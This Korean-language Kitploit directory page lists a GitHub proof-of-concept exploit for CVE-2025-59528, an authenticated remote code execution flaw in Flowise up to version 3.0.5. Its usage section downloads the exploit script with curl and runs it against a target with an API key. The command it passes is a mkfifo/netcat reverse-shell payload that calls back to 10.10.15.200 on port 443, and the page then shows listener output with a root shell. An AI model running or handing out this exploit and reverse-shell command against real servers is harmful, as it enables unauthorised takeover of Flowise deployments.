Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-59528-Flowise-RCE — Flowise 버전 <= 3.0.5용 인증된 RCE PoC — CustomMCP 노드를 통한 취약점 (CVE-2025-59528) | Kitploit
도구/GitHubGitHub/corey-farley/cve-2025-59528-flowise-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubcorey-farley/cve-2025-59528-flowise-rce

CVE-2025-59528-Flowise-RCE

Flowise 버전 <= 3.0.5용 인증된 RCE PoC — CustomMCP 노드를 통한 취약점 (CVE-2025-59528)

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
3개월 전아직 검토되지 않음

CVE-2025-59528-Flowise-RCE

CustomMCP 노드를 통한 Flowise 버전 <= 3.0.5용 인증 RCE PoC (CVE-2025-59528)

공식 GHSA 링크: https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p

리버스 셸 사용 예시:

root@kitploit:~
curl -sSLO 'https://raw.githubusercontent.com/corey-farley/CVE-2025-59528-Flowise-RCE/main/CVE-2025-59528.py'

chmod +x CVE-2025-59528.py

./CVE-2025-59528.py -t 'http://target.com' -k 'API_KEY' -cmd 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.200 443 >/tmp/f'

리스너를 확인하면 작동할 것입니다:

root@kitploit:~
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.15.200] from (UNKNOWN) [10.129.64.221] 43393
sh: can't access tty; job control turned off
/ # whoami
root
도구 다운로드